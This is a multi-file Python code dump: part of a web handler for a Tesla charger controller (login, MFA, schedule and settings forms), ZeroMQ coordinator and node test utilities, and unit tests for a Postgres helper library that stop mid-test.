if self.url.path.startswith("/api/"):
self.do_API_POST()
return
self.fields = urllib.parse.parse_qs(self.post_data.decode("utf-8"))
if self.url.path == "/debug/save":
self.process_save_settings("debug")
return
if self.url.path == "/schedule/save":
# User has submitted schedule.
self.process_save_schedule()
return
if self.url.path == "/settings/save":
# User has submitted settings.
# Call dedicated function
self.process_save_settings()
return
if self.url.path == "/teslaAccount/login":
# User has submitted Tesla login.
# Pass it to the dedicated process_teslalogin function
self.process_teslalogin()
return
if self.url.path == "/teslaAccount/mfaCode":
transactionID = self.getFieldValue("transactionID")
mfaDevice = self.getFieldValue("mfaDevice")
mfaCode = self.getFieldValue("mfaCode")
resp = master.getModuleByName("TeslaAPI").mfaLogin(
transactionID, mfaDevice, mfaCode
)
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(resp))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/teslaAccount/submitCaptcha":
captchaCode = self.getFieldValue("captchaCode")
resp = master.getModuleByName("TeslaAPI").submitCaptchaCode(captchaCode)
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(resp))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/graphs/dates":
# User has submitted dates to graph this period.
objIni = self.getFieldValue("dateIni")
objEnd = self.getFieldValue("dateEnd")
if not objIni or not objEnd:
# Redirect back to graphs page if no Start or End time supplied
self.send_response(302)
self.send_header("Location", "/graphs")
else:
self.process_save_graphs(objIni, objEnd)
self.send_response(302)
self.send_header("Location", "/graphsP")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/vehicle/groupMgmt":
group = self.getFieldValue("group")
op = self.getFieldValue("operation")
vin = self.getFieldValue("vin")
if op == "add":
try:
master.settings["VehicleGroups"][group]["Members"].append(vin)
except ValueError:
logger.error(
"Error adding vehicle %s to group %s" % (vin, group)
)
elif op == "remove":
try:
master.settings["VehicleGroups"][group]["Members"].remove(vin)
except ValueError:
logger.error(
"Error removing vehicle %s from group %s" % (vin, group)
)
master.queue_background_task({"cmd": "saveSettings"})
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"vin": vin,
}
)
self.send_response(302)
self.send_header("Location", "/vehicleDetail/" + vin)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def addButton(self, button_def, extrargs):
# This is a macro which can display differing buttons based on a
# condition. It's a useful way to switch the text on a button based
# on current state.
params = {}
if len(button_def) == 3:
params = button_def[2]
buttontype = "Submit"
if params.get("buttonType", False):
buttontype = params["buttonType"]
page = "<input type='%s' %s id='%s' value='%s'>" % (
buttontype,
extrargs,
button_def[0],
button_def[1],
)
return page
def chargeScheduleDay(self, day):
# Fetch current settings
sched = master.settings.get("Schedule", {})
today = sched.get(day, {})
suffix = day + "ChargeTime"
# Render daily schedule options
page = "<tr>"
page += (
"<td>"
+ self.checkBox("enabled" + suffix, today.get("enabled", 0))
+ "</td>"
)
page += "<td>" + str(day) + "</td>"
page += (
"<td>"
+ self.optionList(
self.timeList,
{"name": "start" + suffix, "value": today.get("start", "00:00")},
)
+ "</td>"
)
page += "<td> to </td>"
page += (
"<td>"
+ self.optionList(
self.timeList,
{"name": "end" + suffix, "value": today.get("end", "00:00")},
)
+ "</td>"
)
page += (
"<td>" + self.checkBox("flex" + suffix, today.get("flex", 0)) + "</td>"
)
page += "<td>Flex Charge</td>"
page += "</tr>"
return page
def checkForUnsafeCharactters(self, text):
# Detect some unsafe characters in user input
# The intention is to minimize the risk of either user input going into the settings file
# or a database without pre-sanitization. We'll reject strings with these characters in them.
unsafe_characters = '@#$%^&*"+<>;/'
if any(c in unsafe_characters for c in text):
return True
else:
return False
def getFieldValue(self, key):
# Parse the form value represented by key, and return the
# value either as an integer or string
keya = str(key)
try:
vala = self.fields[key][0].replace("'", "")
except KeyError:
return None
try:
if int(vala) or vala == "0":
return int(vala)
except ValueError:
return vala
def log_message(self, format, *args):
pass
def optionList(self, list, opts={}):
page = "<div class='form-group'>"
page += "<select class='form-control' id='%s' name='%s'>" % (
opts.get("name", ""),
opts.get("name", ""),
)
for option in list:
sel = ""
if str(opts.get("value", "-1")) == str(option[0]):
sel = "selected"
page += "<option value='%s' %s>%s</option>" % (
option[0],
sel,
option[1],
)
page += "</select>"
page += "</div>"
return page
def process_save_schedule(self):
# Check that schedule dict exists within settings.
# If not, this would indicate that this is the first time
# we have saved the new schedule settings
if master.settings.get("Schedule", None) == None:
master.settings["Schedule"] = {}
# Slight issue with checkboxes, you have to default them all to
# false, otherwise if one is unticked it is just not sent via form data
days = [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
]
for day in days:
if master.settings["Schedule"].get(day, None) == None:
master.settings["Schedule"][day] = {}
master.settings["Schedule"][day]["enabled"] = ""
master.settings["Schedule"][day]["flex"] = ""
# Detect schedule keys. Rather than saving them in a flat
# structure, we'll store them multi-dimensionally
fieldsout = self.fields.copy()
ct = re.compile(
r"(?P<trigger>enabled|end|flex|start)(?P<day>.*?)ChargeTime"
)
for key in self.fields:
match = ct.match(key)
if match:
# Detected a multi-dimensional (per-day) key
# Rewrite it into the settings array and delete it
# from the input
if master.settings["Schedule"].get(match.group(2), None) == None:
# Create dictionary key for this day
master.settings["Schedule"][match.group(2)] = {}
# Set per-day settings
master.settings["Schedule"][match.group(2)][
match.group(1)
] = self.getFieldValue(key)
else:
if master.settings["Schedule"].get("Settings", None) == None:
master.settings["Schedule"]["Settings"] = {}
master.settings["Schedule"]["Settings"][key] = self.getFieldValue(
key
)
# During Phase 1 (backwards compatibility) for the new scheduling
# UI, after writing the settings in the inteded new format, we then
# write back to the existing settings nodes so that it is backwards
# compatible.
# Green Energy Tracking
master.settings["hourResumeTrackGreenEnergy"] = int(
master.settings["Schedule"]["Settings"]["resumeGreenEnergy"][:2]
)
# Scheduled amps
master.settings["scheduledAmpsStartHour"] = int(
master.settings["Schedule"]["Common"]["start"][:2]
)
master.settings["scheduledAmpsEndHour"] = int(
master.settings["Schedule"]["Common"]["end"][:2]
)
master.settings["scheduledAmpsMax"] = float(
master.settings["Schedule"]["Settings"]["scheduledAmpsMax"]
)
# Scheduled Days bitmap backward compatibility
master.settings["scheduledAmpsDaysBitmap"] = (
(1 if master.settings["Schedule"]["Monday"]["enabled"] else 0)
+ (2 if master.settings["Schedule"]["Tuesday"]["enabled"] else 0)
+ (4 if master.settings["Schedule"]["Wednesday"]["enabled"] else 0)
+ (8 if master.settings["Schedule"]["Thursday"]["enabled"] else 0)
+ (16 if master.settings["Schedule"]["Friday"]["enabled"] else 0)
+ (32 if master.settings["Schedule"]["Saturday"]["enabled"] else 0)
+ (64 if master.settings["Schedule"]["Sunday"]["enabled"] else 0)
)
# Save Settings
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_save_settings(self, page="settings"):
# This function will write the settings submitted from the settings
# page to the settings dict, before triggering a write of the settings
# to file
for key in self.fields:
# If the key relates to the car API tokens, we need to pass these
# to the appropriate module, rather than directly updating the
# configuration file (as it would just be overwritten)
if (
key == "carApiBearerToken" or key == "carApiRefreshToken"
) and self.getFieldValue(key) != "":
carapi = master.getModuleByName("TeslaAPI")
if key == "carApiBearerToken":
carapi.setCarApiBearerToken(self.getFieldValue(key))
elif key == "carApiRefreshToken":
carapi.setCarApiRefreshToken(self.getFieldValue(key))
# Write setting to dictionary
master.settings[key] = self.getFieldValue(key)
# If Non-Scheduled power action is either Do not Charge or
# Track Green Energy, set Non-Scheduled power rate to 0
if int(master.settings.get("nonScheduledAction", 1)) > 1:
master.settings["nonScheduledAmpsMax"] = 0
master.queue_background_task({"cmd": "saveSettings"})
# If triggered from the Debug page (not settings page), we need to
# set certain settings to false if they were not seen in the
# request data - This is because Check Boxes don't have a value
# if they aren't set
if page == "debug":
checkboxes = [
"enableDebugCommands",
"spikeAmpsProactively",
"spikeAmpsReactively",
]
for checkbox in checkboxes:
if checkbox not in self.fields:
master.settings[checkbox] = 0
# Redirect to the index page
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_teslalogin(self):
# Check if we are skipping Tesla Login submission
if not master.teslaLoginAskLater:
later = False
try:
later = len(self.fields["later"][0])
except KeyError:
later = False
if later:
master.teslaLoginAskLater = True
if not master.teslaLoginAskLater:
# Connect to Tesla API
carapi = master.getModuleByName("TeslaAPI")
carapi.resetCarApiLastErrorTime()
try:
ret = carapi.apiLogin(
self.fields["email"][0], self.fields["password"][0]
)
except KeyError:
self.send_response(302)
self.send_header("Location", "/teslaAccount/NotSpecified")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
# Redirect to an index page with output based on the return state of
# the function
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(ret))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
else:
# User has asked to skip Tesla Account submission for this session
# Redirect back to /
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_save_graphs(self, initial, end):
# Check that Graphs dict exists within settings.
# If not, this would indicate that this is the first time
# we have saved it
if master.settings.get("Graphs", None) == None:
master.settings["Graphs"] = {}
master.settings["Graphs"]["Initial"] = initial
master.settings["Graphs"]["End"] = end
return
def process_graphs(self, init, end):
# This function will query the green_energy SQL table
result = {}
# We will use the first loaded logging module with query capabilities to build the graphs.
module = None
for candidate_module in master.getModulesByType("Logging"):
if candidate_module["ref"].getCapabilities("queryGreenEnergy"):
logger.log(
logging.INFO6,
"Logging module %s supports queryGreenEnergy",
candidate_module["name"],
)
module = candidate_module["ref"]
else:
logger.log(
logging.INFO6,
"Logging module %s does not support queryGreenEnergy",
candidate_module["name"],
)
# If we were unable to find a loaded Logging module with the capability to query
# values for graphs, return a HTTP error code
if not module:
self.send_response(400)
self.end_headers()
return
try:
result = module.queryGreenEnergy(
{
"dateBegin": datetime.strptime(init, "%Y-%m-%dT%H:%M"),
"dateEnd": datetime.strptime(end, "%Y-%m-%dT%H:%M"),
}
)
except Exception as e:
logger.exception("Excepcion queryGreenEnergy:")
data = {}
data[0] = {"initial": init, "end": end}
i = 1
while i < len(result):
data[i] = {
"time": result[i][0].strftime("%Y-%m-%dT%H:%M:%S"),
"genW": str(result[i][1]),
"conW": str(result[i][2]),
"chgW": str(result[i][3]),
}
i = i + 1
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
try:
self.wfile.write(json_data.encode("utf-8"))
except BrokenPipeError:
logger.debug("Connection Error: Broken Pipe")
return
def debugLogAPI(self, message):
logger.debug(
message
+ " (Url: "
+ str(self.url.path)
+ " / IP: "
+ str(self.client_address[0])
+ ")"
)
return HTTPControlHandler
|
test_utils_zmq_sockets.py
|
import traceback
import zmq
import time
import threading
import logging
from timeit import default_timer as timer
import numpy as np
from zmq import ContextTerminated, ZMQError
from zmq.utils.monitor import recv_monitor_message
from automon.common_node import State
logging = logging.getLogger('automon')
# Use ZMQ Client-Server pattern (https://zguide.zeromq.org/docs/chapter3/#The-Asynchronous-Client-Server-Pattern)
# Between the coordinator and the nodes. Coordinator uses ROUTER socket and the nodes use DEALER socket.
def event_monitor_client(monitor):
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
if evt['event'] == zmq.EVENT_ACCEPTED:
logging.info("Event EVENT_ACCEPTED: {}".format(evt))
if evt['event'] == zmq.EVENT_DISCONNECTED:
logging.info("Event EVENT_DISCONNECTED: {}".format(evt))
break
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
logging.info("Event EVENT_MONITOR_STOPPED: {}".format(evt))
break
monitor.close()
logging.info("Event monitor thread done")
except (ContextTerminated, ZMQError):
# Something went wrong
monitor.close()
logging.info("Event monitor thread done due to context termination")
class NodeDataLoop(threading.Thread):
def __init__(self, context, condition, data_generator, host, port, node, node_idx, b_single_sample_per_round):
self.context = context
self.condition = condition
self.node_idx = node_idx
self.data_generator = data_generator
self.host = host
self.port = port
self.node = node
self.num_data_updates = 0
self.num_detected_full_sync = 0
self.b_single_sample_per_round = b_single_sample_per_round
threading.Thread.__init__(self)
def data_update(self, data_client, idx):
# TODO: should change these values according to the network latency and coordinator full sync time
lazy_sync_latency_seconds_first_time = 10
lazy_sync_latency_seconds = 1.0
full_sync_latency_seconds = 4.0
latency_diff_between_full_and_lazy_sync = full_sync_latency_seconds - lazy_sync_latency_seconds
if idx == self.node_idx:
local_vector = self.data_generator.get_local_vector(self.node_idx)
message_violation = self.node.update_data(local_vector)
if message_violation is not None and len(message_violation) > 0:
data_client.send(message_violation)
self.num_data_updates += 1
time.sleep(lazy_sync_latency_seconds_first_time + (self.num_data_updates - 1) * lazy_sync_latency_seconds + self.num_detected_full_sync * latency_diff_between_full_and_lazy_sync - (timer() - self.start_time))
if self.node.state == State.WaitForSync or self.node.state == State.SuspectWaitForSync:
if not self.b_single_sample_per_round and self.node.state == State.WaitForSync:
logging.info("Node " + str(self.node_idx) + ": detected " + str(self.node.state) + " after " + str(self.num_data_updates) + " data updates")
if self.b_single_sample_per_round:
logging.info("Node " + str(self.node_idx) + ": detected " + str(self.node.state) + " after " + str(self.num_data_updates) + " data updates")
self.num_detected_full_sync += 1
time.sleep(lazy_sync_latency_seconds_first_time + (self.num_data_updates - 1) * lazy_sync_latency_seconds + self.num_detected_full_sync * latency_diff_between_full_and_lazy_sync - (timer() - self.start_time))
def run(self):
data_client = self.context.socket(zmq.DEALER)
data_client.setsockopt(zmq.LINGER, 0)
monitor = data_client.get_monitor_socket()
t = threading.Thread(target=event_monitor_client, args=(monitor,))
t.start()
try:
identity = 'data_loop-%d' % self.node_idx
data_client.identity = identity.encode('ascii')
data_client.connect('tcp://' + self.host + ':' + str(self.port))
with self.condition:
self.condition.wait()
self.start_time = timer()
logging.info('Node data-loop client socket %s started' % identity)
# First data update after the sliding window of the node is full
self.data_update(data_client, self.node_idx)
# For the rest of the data rounds: read data from stream and update node local vector.
# In case of violation is will trigger sync process with the coordinator.
while self.data_generator.has_next():
# Check if the monitor thread finished
if not t.is_alive():
break
_, idx = self.data_generator.get_next_data_point()
if self.b_single_sample_per_round:
self.data_update(data_client, idx)
else:
if idx == self.node_idx:
self.data_update(data_client, idx)
end = timer()
if self.data_generator.has_next():
logging.info("Node " + str(self.node_idx) + ": terminated by event monitor which detected the coordinator disconnected")
logging.info("Node " + str(self.node_idx) + ": the test took: " + str(end - self.start_time) + " seconds")
finally:
logging.info("Node " + str(self.node_idx) + ": data loop ended")
if t.is_alive():
data_client.disable_monitor()
t.join()
logging.info("Node " + str(self.node_idx) + ": disabled event monitor")
data_client.close()
logging.info("Node " + str(self.node_idx) + ": closed data_client socket")
def run_node(host, port, node, node_idx, data_generator, test_folder, b_single_sample_per_round=False):
logging.info("Node " + str(node_idx) + ": num_iterations " + str(data_generator.get_num_iterations()) + ", data_generator state " + str(data_generator.state))
condition = threading.Condition()
context = zmq.Context()
client = context.socket(zmq.DEALER)
client.setsockopt(zmq.LINGER, 0)
identity = '%d' % node_idx
client.identity = identity.encode('ascii')
client.connect('tcp://' + host + ':' + str(port))
logging.info('Node %s started' % identity)
try:
node_data_loop = NodeDataLoop(context, condition, data_generator, host, port, node, node_idx, b_single_sample_per_round)
node_data_loop.start()
# Send ready message to server socket
client.send("ready".encode())
# Wait for start message from the server socket
message = client.recv()
while message != b'start':
message = client.recv()
logging.info("Node " + str(node_idx) + " got start message from the coordinator")
# Signal the data loop to start
with condition:
condition.notifyAll()
while True:
# Check if the data_loop thread finished
if not node_data_loop.is_alive():
break
event = client.poll(timeout=3000) # wait 3 seconds
if event == 0:
# Timeout reached before any events were queued
pass
else:
# Events queued within the time limit
message = client.recv()
if len(message) == 0:
logging.info("Node " + str(node_idx) + " socket closed")
break
message_out = node.parse_message(message)
if message_out is not None:
client.send(message_out)
# In a regular exit the data loop thread finishes, which causes the main thread to break the loop and get here
logging.info("Node " + str(node_idx) + ": main loop ended after data loop ended")
finally:
logging.info("Node " + str(node_idx) + ": main loop ended")
with condition:
condition.notifyAll()
node_data_loop.join()
client.close()
logging.info("Node " + str(node_idx) + ": closed client socket")
context.destroy()
node.dump_stats(test_folder)
def init_client_socket(node_idx, host='127.0.0.1', port=6400):
context = zmq.Context()
client_socket = context.socket(zmq.DEALER)
client_socket.setsockopt(zmq.LINGER, 0)
identity = '%d' % node_idx
client_socket.identity = identity.encode('ascii')
client_socket.connect('tcp://' + host + ':' + str(port))
logging.info('Node %s started' % identity)
try:
# Send ready message to server socket
client_socket.send("ready".encode())
# Wait for start message from the server socket
message = client_socket.recv()
while message != b'start':
message = client_socket.recv()
logging.info("Node " + str(node_idx) + " got start message from the coordinator")
except Exception as e:
logging.info(traceback.print_exc())
return client_socket
def event_monitor_server(monitor):
num_connections = 0
num_disconnections = 0
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
if evt['event'] == zmq.EVENT_ACCEPTED:
logging.info("Event EVENT_ACCEPTED: {}".format(evt))
num_connections += 1
if evt['event'] == zmq.EVENT_DISCONNECTED:
logging.info("Event EVENT_DISCONNECTED: {}".format(evt))
num_disconnections += 1
if num_disconnections == num_connections:
break
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
logging.info("Event EVENT_MONITOR_STOPPED: {}".format(evt))
break
monitor.close()
logging.info("Event monitor thread done")
except (ContextTerminated, ZMQError):
# In case an error occurred in the coordinator the run_coordinator stops the experiment and terminates the zeromq context.
# This termination causes this exception in this thread.
monitor.close()
logging.info("Event monitor thread done due to context termination")
def run_coordinator(coordinator, port, num_nodes, test_folder):
start_time = timer()
context = zmq.Context()
server = context.socket(zmq.ROUTER)
server.setsockopt(zmq.LINGER, 0)
server.bind('tcp://0.0.0.0:' + str(port))
logging.info("Coordinator server socket started")
try:
monitor = server.get_monitor_socket()
t = threading.Thread(target=event_monitor_server, args=(monitor,))
t.start()
# Wait for ready message from all the node sockets
b_ready_nodes = np.zeros(num_nodes, dtype=bool)
while not np.all(b_ready_nodes):
ident, message = server.recv_multipart()
logging.info("Got message: " + message.decode() + " from node " + ident.decode())
if message == b'ready':
b_ready_nodes[int(ident)] = True
start_time = timer()
# After all node sockets are ready, send start signal to all the nodes to start the data loop
for node_idx in range(num_nodes):
server.send_multipart([str(node_idx).encode('ascii'), "start".encode()])
while True:
# Check if the monitor thread finished
if not t.is_alive():
break
event = server.poll(timeout=3000) # wait 3 seconds
if event == 0:
# Timeout reached before any events were queued
pass
else:
# Events queued within the time limit
ident, message = server.recv_multipart()
if len(message) == 0:
logging.info("Node " + ident.decode() + " socket closed")
messages_out = coordinator.parse_message(message)
for node_idx, message in messages_out:
server.send_multipart([str(node_idx).encode('ascii'), message])
# The monitor thread knows when all nodes disconnected and exits. This causes the main thread break from the loop and get here.
server.close()
logging.info("Coordinator stopped by the monitor thread")
except Exception as e:
# Exception was thrown by the coordinator
logging.info("Coordinator stopped with an error")
logging.info(traceback.print_exc())
server.disable_monitor()
t.join()
logging.info("Coordinator : disabled event monitor")
finally:
server.close()
context.destroy()
end = timer()
logging.info("The test took: " + str(end - start_time) + " seconds")
coordinator.dump_stats(test_folder)
|
tests.py
|
from collections import namedtuple
from threading import Thread
from unittest import TestCase
from postgres import (
AlreadyRegistered, NotAModel, NotRegistered, NoSuchType, NoTypeSpecified,
Postgres,
)
from postgres.cache import Cache
from postgres.cursors import (
BadBackAs, TooFew, TooMany,
Row, SimpleDictCursor, SimpleNamedTupleCursor, SimpleRowCursor, SimpleTupleCursor,
)
from postgres.orm import Model, ReadOnlyAttribute, UnknownAttributes
from psycopg2.errors import InterfaceError, ProgrammingError, ReadOnlySqlTransaction
from pytest import mark, raises
class Heck(Exception):
pass
# harnesses
# =========
class WithSchema(TestCase):
def setUp(self):
self.db = Postgres()
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
def tearDown(self):
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
del self.db
class WithData(WithSchema):
def setUp(self):
WithSchema.setUp(self)
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES ('baz')")
self.db.run("INSERT INTO foo VALUES ('buz')")
# db.run
# ======
class TestRun(WithSchema):
def test_run_runs(self):
self.db.run("CREATE TABLE foo (bar text)")
actual = self.db.all("SELECT tablename FROM pg_tables "
"WHERE schemaname='public'")
assert actual == ["foo"]
def test_run_inserts(self):
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES ('baz')")
actual = self.db.one("SELECT * FROM foo ORDER BY bar")
assert actual == "baz"
def test_run_accepts_bind_parameters_as_keyword_arguments(self):
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES (%(bar)s)", bar='baz')
actual = self.db.one("SELECT * FROM foo ORDER BY bar")
assert actual == "baz"
# db.all
# ======
class TestRows(WithData):
def test_all_fetches_all_rows(self):
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_all_fetches_one_row(self):
actual = self.db.all("SELECT * FROM foo WHERE bar='baz'")
assert actual == ["baz"]
def test_all_fetches_no_rows(self):
actual = self.db.all("SELECT * FROM foo WHERE bar='blam'")
assert actual == []
def test_all_doesnt_choke_on_values_column(self):
actual = self.db.all("SELECT bar AS values FROM foo")
assert actual == ["baz", "buz"]
def test_bind_parameters_as_dict_work(self):
params = {"bar": "baz"}
actual = self.db.all("SELECT * FROM foo WHERE bar=%(bar)s", params)
assert actual == ["baz"]
def test_bind_parameters_as_tuple_work(self):
actual = self.db.all("SELECT * FROM foo WHERE bar=%s", ("baz",))
assert actual == ["baz"]
def test_bind_parameters_as_kwargs_work(self):
actual = self.db.all("SELECT * FROM foo WHERE bar=%(bar)s", bar='baz')
assert actual == ["baz"]
def test_all_raises_BadBackAs(self):
with self.assertRaises(BadBackAs) as context:
self.db.all("SELECT * FROM foo", back_as='foo')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'foo'
# db.one
# ======
class TestWrongNumberException(WithData):
def test_TooFew_message_is_helpful(self):
try:
actual = self.db.one("CREATE TABLE foux (baar text)")
except TooFew as exc:
actual = str(exc)
assert actual == "Got -1 rows; expecting 0 or 1."
def test_TooMany_message_is_helpful_for_two_options(self):
actual = str(TooMany(2, 1, 1))
assert actual == "Got 2 rows; expecting exactly 1."
def test_TooMany_message_is_helpful_for_a_range(self):
actual = str(TooMany(4, 1, 3))
assert actual == "Got 4 rows; expecting between 1 and 3 (inclusive)."
class TestOne(WithData):
def test_one_raises_TooFew(self):
with self.assertRaises(TooFew):
self.db.one("CREATE TABLE foux (baar text)")
def test_one_rollsback_on_error(self):
try:
self.db.one("CREATE TABLE foux (baar text)")
except TooFew:
pass
with self.assertRaises(ProgrammingError):
self.db.all("SELECT * FROM foux")
def test_one_returns_None(self):
actual = self.db.one("SELECT * FROM foo WHERE bar='blam'")
assert actual is None
def test_one_returns_default(self):
class WHEEEE: pass # noqa: E701
actual = self.db.one("SELECT * FROM foo WHERE bar='blam'", default=WHEEEE)
assert actual is WHEEEE
def test_one_raises_default(self):
exception = RuntimeError('oops')
try:
self.db.one("SELECT * FROM foo WHERE bar='blam'", default=exception)
except Exception as e:
if e is not exception:
raise
else:
raise AssertionError('exception not raised')
def test_one_returns_default_after_derefencing(self):
default = 0
actual = self.db.one("SELECT NULL AS foo", default=default)
assert actual is default
def test_one_raises_default_after_derefencing(self):
exception = RuntimeError('oops')
try:
self.db.one("SELECT NULL AS foo", default=exception)
except Exception as e:
if e is not exception:
raise
else:
raise AssertionError('exception not raised')
def test_one_returns_one(self):
actual = self.db.one("SELECT * FROM foo WHERE bar='baz'")
assert actual == "baz"
def test_one_accepts_a_dict_for_bind_parameters(self):
actual = self.db.one("SELECT %(bar)s as bar", {"bar": "baz"})
assert actual == "baz"
def test_one_accepts_a_tuple_for_bind_parameters(self):
actual = self.db.one("SELECT %s as bar", ("baz",))
assert actual == "baz"
def test_one_accepts_bind_parameters_as_keyword_arguments(self):
actual = self.db.one("SELECT %(bar)s as bar", bar='baz')
assert actual == "baz"
def test_one_doesnt_choke_on_values_column(self):
actual = self.db.one("SELECT 1 AS values")
assert actual == 1
def test_one_raises_TooMany(self):
self.assertRaises(TooMany, self.db.one, "SELECT * FROM foo")
def test_one_raises_BadBackAs(self):
with self.assertRaises(BadBackAs) as context:
self.db.one("SELECT * FROM foo LIMIT 1", back_as='foo')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'foo'
# db.cache
# ========
class TestCache(TestCase):
def setUp(self):
self.db = Postgres(cache=Cache(max_size=1), cursor_factory=SimpleTupleCursor)
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
self.db.run("CREATE TABLE foo (key text, value int)")
self.db.run("INSERT INTO foo VALUES ('a', 1)")
self.db.run("INSERT INTO foo VALUES ('b', 2)")
def test_one_returns_cached_row(self):
query = "SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, max_age=10)
r2 = self.db.one(query, max_age=10)
assert r2 is r1
def test_all_returns_cached_rows(self):
query = "SELECT * FROM foo ORDER BY key"
r1 = self.db.all(query, max_age=10)
r2 = self.db.all(query, max_age=10)
assert r2 == r1
assert r2 is not r1
assert r2[0] is r1[0]
def test_back_as_is_compatible_with_caching(self):
query = "SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, back_as=dict, max_age=10)
r2 = self.db.one(query, back_as=namedtuple, max_age=10)
assert r1 == r2._asdict()
rows = self.db.all(query, back_as='Row', max_age=10)
assert rows == [r1]
def test_all_returns_row_cached_by_one(self):
query = "SELECT * FROM foo WHERE key = 'a'"
row = self.db.one(query, max_age=10)
rows = self.db.all(query, max_age=10)
assert rows == [row]
assert rows[0] is row
def test_one_raises_TooMany_when_the_cache_contains_multiple_rows(self):
query = "SELECT * FROM foo"
rows = self.db.all(query, max_age=10)
assert len(rows) == 2
with self.assertRaises(TooMany):
self.db.one(query, max_age=10)
def test_cache_max_size(self):
query1 = b"SELECT * FROM foo WHERE key = 'a'"
query2 = b"SELECT * FROM foo WHERE key = 'b'"
self.db.all(query1, max_age=10)
assert set(self.db.cache.entries.keys()) == {query1}
self.db.all(query2, max_age=10)
assert set(self.db.cache.entries.keys()) == {query2}
def test_cache_max_age(self):
query = b"SELECT * FROM foo WHERE key = 'a'"
r1 = self.db.one(query, max_age=0)
r2 = self.db.one(query, max_age=10)
assert r2 is not r1
def test_cache_prune(self):
self.db.cache.max_size = 2
query1 = b"SELECT * FROM foo WHERE key = 'a'"
query2 = b"SELECT * FROM foo WHERE key = 'b'"
self.db.one(query1, max_age=-1)
self.db.one(query2, max_age=10)
assert set(self.db.cache.entries.keys()) == {query1, query2}
self.db.cache.prune()
assert set(self.db.cache.entries.keys()) == {query2}
def test_cache_prevents_concurrent_queries(self):
with self.db.get_cursor() as cursor:
cursor.run("LOCK TABLE foo IN EXCLUSIVE MODE")
def insert():
self.db.one("INSERT INTO foo VALUES ('c', 3) RETURNING *", max_age=1)
t1 = Thread(target=insert)
t2 = Thread(target=insert)
t1.start()
t2.start()
cursor.run("COMMIT") # this releases the table lock
t1.join()
t2.join()
n = self.db.one("SELECT count(*) FROM foo WHERE key = 'c'")
assert n == 1
# db.get_cursor
# =============
class TestCursor(WithData):
def test_get_cursor_gets_a_cursor(self):
with self.db.get_cursor(cursor_factory=SimpleDictCursor) as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = cursor.fetchall()
assert actual == [{"bar": "baz"}, {"bar": "blam"}, {"bar": "buz"}]
def test_transaction_is_isolated(self):
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_transaction_commits_on_success(self):
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "blam", "buz"]
def test_transaction_rolls_back_on_failure(self):
try:
with self.db.get_cursor() as cursor:
cursor.execute("INSERT INTO foo VALUES ('blam')")
cursor.execute("SELECT * FROM foo ORDER BY bar")
raise Heck
except Heck:
pass
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_cursor_rollback_exception_is_ignored(self):
try:
with self.db.get_cursor() as cursor:
cursor.connection.close()
raise Heck
except Heck:
pass
def test_we_close_the_cursor(self):
with self.db.get_cursor() as cursor:
cursor.execute("SELECT * FROM foo ORDER BY bar")
with self.assertRaises(InterfaceError):
cursor.fetchall()
def test_monkey_patch_execute(self):
expected = "SELECT 1"
def execute(this, sql, params=[]):
return sql
from postgres.cursors import SimpleCursorBase
SimpleCursorBase.execute = execute
with self.db.get_cursor() as cursor:
actual = cursor.execute(expected)
del SimpleCursorBase.execute
assert actual == expected
def test_autocommit_cursor(self):
try:
with self.db.get_cursor(autocommit=True) as cursor:
try:
cursor.execute("INVALID QUERY")
except ProgrammingError:
pass
cursor.execute("INSERT INTO foo VALUES ('blam')")
with self.db.get_cursor() as cursor:
n = cursor.one("SELECT count(*) FROM foo")
assert n == 3
raise KeyboardInterrupt()
except KeyboardInterrupt:
pass
with self.db.get_cursor() as cursor:
n = cursor.one("SELECT count(*) FROM foo")
